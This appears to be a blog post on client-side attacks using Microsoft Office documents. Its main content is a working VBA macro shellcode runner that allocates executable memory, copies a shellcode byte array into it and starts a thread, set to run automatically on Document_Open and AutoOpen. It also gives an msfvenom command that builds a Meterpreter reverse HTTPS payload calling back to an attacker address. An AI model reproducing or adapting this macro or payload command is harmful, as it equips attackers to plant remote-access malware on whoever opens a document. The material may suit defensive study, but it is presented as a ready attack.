This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers.
Office Products are some of the most widely utilised productivity tools around the world and, are a great targets for exploitation by hackers.
According to Statistica , Office 365 is used by over a million companies worldwide, with over 731,000 companies in the United States alone using the office suite software. Canada ranks third in users at just over 83,000, behind the United Kingdom at approximately 187,000. In terms of actual users, there are 1.2 billion worldwide ..
Most users operate the office apps in their native desktop versions on their devices rather than using the less mature and feature-rich browser app. When looking at a target for client-side attacks, the data shows that the desktop office apps would be a prioritised target.
The evil macro below shows how this can be exploited with VBA.
Code Example
The code below is a shellcode runner, a piece of code that executes shellcode in memory that has been built using VBA. The typical approach is to use three Win32 APIs from Kernel32.dll:
VirtualAlloc,
RtlMoveMemory
CreateThread.
VirtualAlloc is used to allocate unmanaged memory that is writable, readable, and executable. This will then be copied to the shellcode into the newly allocated memory with RtlMoveMemory.
This creates a new execution thread in the process through CreateThread to execute the VBA shellcode.
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Function MyMacro()
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
Dim res As Long
buf = Array(232, 130, 0, 0, 0, 96, 137, 229, 49, 192, 100, 139, 80, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 226, 242, 82, 87, 139, 82, 16, 139, 74, 60, 139, 76, 17, 120, 227, 72, 1, 209, 81, 139, 89, 32, 1, 211, 139, 73, 24, 227, 58, 73, 139, 52, 139, 1, 214, 49, 255, 172, 193, _
...
49, 57, 50, 46, 49, 54, 56, 46, 49, 55, 54, 46, 49, 52, 50, 0, 187, 224, 29, 42, 10, 104, 166, 149, 189, 157, 255, 213, 60, 6, 124, 10, 128, 251, 224, 117, 5, 187, 71, 19, 114, 111, 106, 0, 83, 255, 213)..<SNIP>
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
For counter = LBound(buf) To UBound(buf)
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
res = CreateThread(0, 0, addr, 0, 0, 0)
End Function
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
The Payload
In order to generate the shellcode, we need to know the target architecture. Obviously we are targeting a 64-bit Windows machine, but Microsoft Word 2016 installs as 32-bit by default, so we will generate 32-bit shellcode.
We'll use msfvenom to generate shellcode formatted as vbapplication, as the first stage of a Meterpreter shell.
Since we will be executing our shellcode inside the Word application, we specify the EXITFUNC with a value of "thread" instead of the default value of "process" to avoid closing Microsoft Word when the shellcode exits.
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.49.64 LPORT=443 EXITFUNC=thread -f vbapplication